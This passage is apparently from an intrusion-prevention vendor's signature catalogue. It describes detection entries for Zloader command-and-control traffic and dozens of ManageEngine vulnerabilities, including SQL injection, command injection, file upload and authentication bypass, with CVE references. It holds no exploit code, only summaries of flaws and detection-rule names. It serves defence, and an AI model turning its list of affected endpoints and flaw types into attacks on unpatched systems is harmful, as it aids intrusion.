Description: Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based on the leaked Zeus source code that emerged in 2015. This fingerprint detects the Zloader version 2.9.4.0's command-and-control traffic.
Situation: DNS-UDP_Zloader-Malware-DNS-Tunneling
HTTP_CSH-Zloader-Malware-C2-Traffic
Back to top

Zml-Cgi-Directory-Traversal

About this vulnerability: zml.cgi directory traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Abe Timmerman zml.cgi
Type: Directory Traversal
Description: The zml.cgi script suffers from a directory traversal vulnerability that allows the attacker to view any files on the system with the privileges of the web server.
References:
CVE-2001-1209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1209
BID-3759
http://www.securityfocus.com/bid/3759
Back to top

Zoho-Corporation-Manageengine-Admanager-Plus-Command-Injection-CVE-2023-29084

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADManager Plus
Risk: High
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: A command injection vulnerability has been reported in Zoho ManageEngine ADManager Plus. This vulnerability is due to improper validation of proxy settings. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server.
Situation: HTTP_CRL-Zoho-Corporation-Manageengine-Admanager-Plus-Command-Injection-CVE-2023-29084
References:
CVE-2023-29084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29084
Back to top

Zoho-Manageengine-ADaudit-Plus-Arbitrary-File-Write-CVE-2021-42847

About this vulnerability: A vulnerability in Zoho ManageEngine ADAudit Plus
Risk: High
First detected in: sgpkg-ips-1587-5242
Last changed: sgpkg-ips-1587-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADAudit Plus
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in Zoho ManageEngine ADAudit Plus versions before 7006. Successful exploitation of this vulnerability could lead to arbitrary code execution.
Situation: File-Text_Zoho-Manageengine-ADaudit-Plus-Arbitrary-File-Write-CVE-2021-42847
References:
CVE-2021-42847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42847
Back to top

Zoho-Manageengine-ADaudit-Plus-Getlockouthistorydata-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADAudit Plus
Risk: Moderate
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADAudit Plus
Type: Input Validation
Description: Improper input validation in the Account lockout reports causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-ADaudit-Plus-Getlockouthistorydata-SQL-Injection
References:
CVE-2024-5467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5467
Back to top

Zoho-Manageengine-ADaudit-Plus-Processtrackinglistener-External-Entity-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADAudit Plus
Risk: High
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADAudit Plus
Type: Input Validation
Description: An XXE vulnerability has been reported in Zoho ManageEngine ADAudit Plus. This vulnerability is due to insufficient validation of data processed by the ProcessTrackingListener class. The CVE includes two other vulnerabilities, a path traversal vulnerability and insecure deserialization vulnerability, that can be chained with the XXE vulnerability. A remote, unauthenticated attacker can exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation will result in arbitrary code execution within the security context of the user running the vulnerable application.
Situation: HTTP_CRL-Zoho-Manageengine-ADaudit-Plus-Processtrackinglistener-External-Entity-Injection
References:
CVE-2022-28219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28219
Back to top

Zoho-Manageengine-Admanager-Plus-CVE-2021-37539-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADManager Plus
Risk: Moderate
First detected in: sgpkg-ips-1413-5242
Last changed: sgpkg-ips-1413-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: Lack of proper validation of uploaded files submitted to the /RestAPI/SmartCard endpoint of Zoho ManageEngine ADManager Plus causes a vulnerability that can potentially allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Admanager-Plus-CVE-2021-37539-Unrestricted-File-Upload
References:
CVE-2021-37539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37539
Back to top

Zoho-Manageengine-Admanager-Plus-Licenseaction-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADManager Plus
Risk: Moderate
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: Lack of validation of uploaded files in the LicenseAction class of Zoho ManageEngine ADManager Plus causes an unrestricted file upload vulnerability. A successful exploit allows an attacker to upload and execute arbitrary files on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Admanager-Plus-Licenseaction-Unrestricted-File-Upload
References:
CVE-2021-37926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37926
Back to top

Zoho-Manageengine-Admanager-Plus-Modifyphotoaction-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADManager Plus
Risk: Moderate
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: Improper validation of uploaded files in ModifyPhotoAction class causes a vulnerability in Zoho ADManager Plus. A successful exploit allows an attacker to execute arbitrary code on the target system with system privileges.
Situation: HTTP_CS-Zoho-Manageengine-Admanager-Plus-Modifyphotoaction-Unrestricted-File-Upload
References:
CVE-2021-37918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37918
Back to top

Zoho-Manageengine-Admanager-Plus-Passwordexpiryaction-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADManager Plus
Risk: Moderate
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: Improper validation of uploaded files in the PasswordExpiryAction class of ManageEngine ADManager Plus causes a vulnerability that can be exploited to upload arbitrary files and execute arbitrary code on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Admanager-Plus-Passwordexpiryaction-Unrestricted-File-Upload
References:
CVE-2021-20130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20130
Back to top

Zoho-Manageengine-Admanager-Plus-Proxy-Settings-Command-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADManager Plus
Risk: High
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1538-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: A command injection vulnerability has been reported for Zoho ManageEngine ADManager Plus. This vulnerability is due to improper validation of proxy settings. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server.Successfully exploiting this vulnerability could result in OS command injection.
Situation: HTTP_CRL-Zoho-Manageengine-Admanager-Plus-Proxy-Settings-Command-Injection
References:
CVE-2022-42904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42904
Back to top

Zoho-Manageengine-Admanager-Plus-ReportsAction-Unrestricted-File-Upload

About this vulnerability: A vulnerability in ManageEngine ADManager Plus.
Risk: High
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: A vulnerability in ManageEngine ADManager Plus, versions before 7111, which allows remote attackers to execute arbitrary code via an unrestricted file upload, due to insufficient validation of uploaded files in the ReportsAction class.
Situation: HTTP_CS-Zoho-Manageengine-Admanager-Plus-ReportsAction-Unrestricted-File-Upload
References:
CVE-2021-37921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37921
Back to top

Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADSelfService Plus
Risk: Moderate
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADSelfService Plus
Type: Malfunction
Description: Improper normalization of URLs before validation causes an authentication bypass vulnerability in Zoho ManageEngine ADSelfService Plus. A successful exploit allows an attacker to bypass authentication and execute arbitrary commands on the target system.
Situation: HTTP_CSU-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
References:
CVE-2021-40539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539
Back to top

Zoho-Manageengine-Adselfservice-Plus-Mobile-App-Authentication-API-DoS

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADSelfService Plus
Risk: High
First detected in: sgpkg-ips-1603-5242
Last changed: sgpkg-ips-1603-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADSelfService Plus
Type: Input Validation
Description: A denial of service vulnerability has been reported for Zoho ManageEngine ADSelfService Plus. This vulnerability is due to improper input validation in the Mobile App Authentication API. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Mobile-App-Authentication-API-DoS
References:
CVE-2023-28342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28342
Back to top

Zoho-Manageengine-Adselfservice-Plus-Password-Command-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ADSelfService Plus
Risk: Moderate
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ADSelfService Plus
Type: Input Validation
Description: Improper validation of user input in the password change functions causes a command injection vulnerability in Zoho Adselfservice Plus. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Password-Command-Injection
References:
CVE-2021-28958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28958
Back to top

Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: Improper validation of request parameters causes a command injection vulnerability in ManageEngine Applications Manager. A successful exploit allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection
References:
CVE-2018-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7890
Back to top

Zoho-Manageengine-Applications-Manager-Alertres_mtrgrp.jsp-Sid-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: Improper validation of user-supplied input in causes an SQL injection vulnerability in Zoho ManageEngine Application Manager. A successful exploit allows an attacker to execute arbitrary SQL and potentially other code on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Alertres_mtrgrp.jsp-Sid-SQL-Injection
References:
CVE-2020-15533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15533
Back to top

Zoho-Manageengine-Applications-Manager-Buffer.jsp-Resourceid-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: A SQL injection vulnerability exists in the Zoho ManageEngine Applications Manager. The vulnerability is due to improper validation of user-supplied input when processing the request submitted to buffer.jsp. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the execution of arbitrary code in the security context of the SYSTEM.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Buffer.jsp-Resourceid-SQL-Injection
References:
CVE-2020-15927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15927
Back to top

Zoho-Manageengine-Applications-Manager-Custom-Monitor-Type-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: There exists an SQL injection vulnerability in the Zoho ManageEngine Applications Manager. Successful exploitation could lead in execution of arbitrary SQL statements.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Custom-Monitor-Type-SQL-Injection
Back to top

Zoho-Manageengine-Applications-Manager-CVE-2023-28341-Stored-XSS

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: High
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Zoho ManageEngine Applications Manager. The vulnerability is due to insufficient validation of user input on the incorrect login detail page. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution in the security context of a target user's browser.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-CVE-2023-28341-Stored-XSS
References:
CVE-2023-28341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28341
Back to top

Zoho-Manageengine-Applications-Manager-Displayname-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in the Zoho ManageEngine Applications Manager. Successful exploitation could lead in arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Displayname-Stored-Cross-Site-Scripting
Back to top

Zoho-Manageengine-Applications-Manager-Getassociatemonitors-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: A SQL injection vulnerability exists in the Zoho ManageEngine Applications Manager. The vulnerability is due to improper validation of user-supplied input when processing the request in getAssociateMonitors method. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the execution of arbitrary code in the security context of the SYSTEM.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Getassociatemonitors-SQL-Injection
Back to top

Zoho-Manageengine-Applications-Manager-Mypage.do-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: A SQL injection vulnerability exists in the Zoho ManageEngine Applications Manager. The vulnerability is due to improper validation of user-supplied input in processing MyPage.do action. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the execution of arbitrary code in the security context of the SYSTEM.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Mypage.do-SQL-Injection
References:
CVE-2020-27995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27995
Back to top

Zoho-Manageengine-Applications-Manager-Popup_sla.jsp-Sid-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: There has been reported an SQL injection vulnerability in Zoho ManageEngine Applications Manager. This vulnerability could be remotely exploited. Successful exploitation could lead in remote code execution.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Popup_sla.jsp-Sid-SQL-Injection
References:
CVE-2019-11448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11448
Back to top

Zoho-Manageengine-Applications-Manager-Program-Action-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1336-5242
Last changed: sgpkg-ips-1336-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in the Zoho ManageEngine Applications Manager. Successful exploitation could lead in arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Program-Action-Cross-Site-Scripting
Back to top

Zoho-Manageengine-Applications-Manager-Resourceid-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: There has been reported an SQL injection vulnerability in Zoho ManageEngine Applications Manager. This vulnerability could be exploited by unauthenticated attacker. Successful exploitation results in arbitrary SQL code execution.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Resourceid-SQL-Injection
References:
CVE-2019-11469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11469
Back to top

Zoho-Manageengine-Applications-Manager-Rulesconstructor.jsp-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: A SQL injection vulnerability exists in the Zoho ManageEngine Applications Manager. The vulnerability is due to improper validation of user-supplied input when processing the request submitted to RulesConstructor.jsp. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the execution of arbitrary code in the security context of the SYSTEM.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Rulesconstructor.jsp-SQL-Injection
References:
CVE-2020-16267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16267
Back to top

Zoho-Manageengine-Applications-Manager-Showmonitorgroupview-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: A SQL injection vulnerability exists in the Zoho ManageEngine Applications Manager. The vulnerability is due to improper validation of user-supplied input when processing the request in showMonitorGroupView method. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the execution of arbitrary code in the security context of the SYSTEM.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Showmonitorgroupview-SQL-Injection
Back to top

Zoho-Manageengine-Applications-Manager-Uploadaction-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1279-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: Improper validation of request parameters causes a file upload vulnerability in Zoho ManageEngine Application Manager. A successful exploit allows an attacker to upload files to arbitrary locations on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Applications-Manager-Uploadaction-Arbitrary-File-Upload
References:
CVE-2020-14008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14008
Back to top

Zoho-Manageengine-Applications-Manager-Uricollector-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: Improper validation of user-supplied input to the com.adventnet.appmanager.filter.UriCollector Java class causes an SQL injection vulnerability in Zoho ManageEngine Applications Manager. A successful exploit allows an attacker to potentially execute arbitrary code on the target system with system privileges.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Uricollector-SQL-Injection
References:
CVE-2020-35765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35765
Back to top

Zoho-Manageengine-Applications-Manager-Url-Monitor-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: There exists an SQL injection vulnerability in the Zoho ManageEngine Applications Manager. Successful exploitation could lead in the execution of arbitrary SQL statements.
Situation: HTTP_CRL-Zoho-Manageengine-Applications-Manager-Url-Monitor-SQL-Injection
Back to top

Zoho-Manageengine-Applications-Manager-Userconfigurationaction-XSS

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: Improper input validation in the user configuration detail import causes a cross-site scripting vulnerability, which can be exploited to allow an attacker to execute arbitrary scripts in a user's browser.
Situation: File-Text_Zoho-Manageengine-Applications-Manager-Userconfigurationaction-Cross-Site-Scripting
References:
CVE-2021-31813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31813
Back to top

Zoho-Manageengine-AppManager-Masrequestprocessor-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation Manageengine Application Manager
Risk: Moderate
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Applications Manager
Type: Input Validation
Description: Improper validation of user-supplied input in the MASRequestProcessor component of Zoho Manageengine Application Manager causes an SQL injection vulnerability. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CSU-Zoho-Manageengine-Applications-Manager-Masrequestprocessor-Serverid-SQL-Injection
Back to top

Zoho-Manageengine-Datasecurity-Plus-Authentication-Bypass

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine DataSecurity Plus
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine DataSecurity Plus
Type: Malfunction
Description: Zoho ManageEngine has default credentials that allow an attacker to bypass authentication and gain administrator access to the system.
Situation: Generic_CS-Zoho-Manageengine-Datasecurity-Plus-Authentication-Bypass
References:
CVE-2020-11532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11532
Back to top

Zoho-Manageengine-Datasecurity-Plus-Directory-Traversal

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine DataSecurity Plus
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine DataSecurity Plus
Type: Input Validation
Description: There exists a directory traversal vulnerability in Zoho ManageEngine DataSecurity Plus. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Zoho-Manageengine-Datasecurity-Plus-Directory-Traversal
References:
CVE-2020-11531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11531
Back to top

Zoho-Manageengine-Desktop-Central-Appdependency-Arbitrary-File-Write

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Desktop Central
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Desktop Central
Type: Directory Traversal
Description: There exists an arbitrary file write vulnerability in Zoho ManageEngine Desktop Central. Successful exploitation could lead in arbitrary code execution on the target system.
Situation: File-Zip_Zoho-Manageengine-Desktop-Central-Appdependency-Arbitrary-File-Write
References:
CVE-2020-10859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10859
Back to top

Zoho-Manageengine-Desktop-Central-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Desktop Central
Risk: Moderate
First detected in: sgpkg-ips-1086-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Desktop Central
Type: Directory Traversal
Description: Insufficient input validation in requests handled by AgentTrayIconServlet causes a file deletion vulnerability in Zoho Corporation ManageEngine Desktop Central. A successful exploit allows an attacker to delete arbitrary files on the target system without authentication.
Situation: HTTP_CRL-Zoho-Manageengine-Desktop-Central-Arbitrary-File-Deletion
References:
CVE-2018-12999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12999
Back to top

Zoho-Manageengine-Desktopcentral-Authentication-Bypass-CVE-2021-44515

About this vulnerability: A vulnerability in Zoho ManageEngine Desktop Central
Risk: High
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Malfunction
Description: An authentication bypass has been reported in Zoho ManageEngine Desktop Central. A remote attacker could use this vulnerability to execute arbitrary code via a crafted HTTP request.
Situation: HTTP_CSH-Zoho-Manageengine-Desktopcentral-Authentication-Bypass-CVE-2021-44515
References:
CVE-2021-44515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515
Back to top

Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Desktop Central
Risk: Moderate
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Desktop Central
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Zoho ManageEngine Desktop Central. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization
HTTP_CRL-Manageengine-Desktop-Central-Java-Deserialization
References:
CVE-2020-10189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
Back to top

Zoho-Manageengine-Multiple-Products-Getdnsresolveoption-Command-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Netflow Analyzer
Risk: Moderate
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Netflow Analyzer
Type: Input Validation
Description: Improper validation of data returned from the getDNSResolveOption function causes a command injection vulnerability in Zoho ManageEngine, allowing an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Multiple-Products-Getdnsresolveoption-Command-Injection
References:
CVE-2022-37024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37024
Back to top

Zoho-Manageengine-Multiple-Products-Getnmapinitialoption-Command-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Netflow Analyzer
Risk: Moderate
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Netflow Analyzer; Zoho Corporation ManageEngine Network Configuration Manager; Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Improper input validation in the getNmapInitialOption function causes a command injection vulnerability in multiple Zoho ManageEngine products. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Multiple-Products-Getnmapinitialoption-Command-Injection
References:
CVE-2022-38772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38772
Back to top

Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine
Risk: Moderate
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Platform: Generic
Software: ManageEngine AssetExplorer; Zoho Corporation ManageEngine ServiceDesk; Zoho Corporation ManageEngine SupportCenter
Type: Input Validation
Description: A denial of service vulnerability has been reported in Zoho ManageEngine multiple products. The vulnerability is due to input validation in the image size parameters defined in the image header. A remote authenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could result in denial-of-service due to large memory allocation.
Situation: HTTP_CRL-Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-Binary_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-JPEG_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-PNG_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-GIF_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
References:
CVE-2023-26601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26601
Back to top

Zoho-Manageengine-Multiple-Products-Importtechniciansaction-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
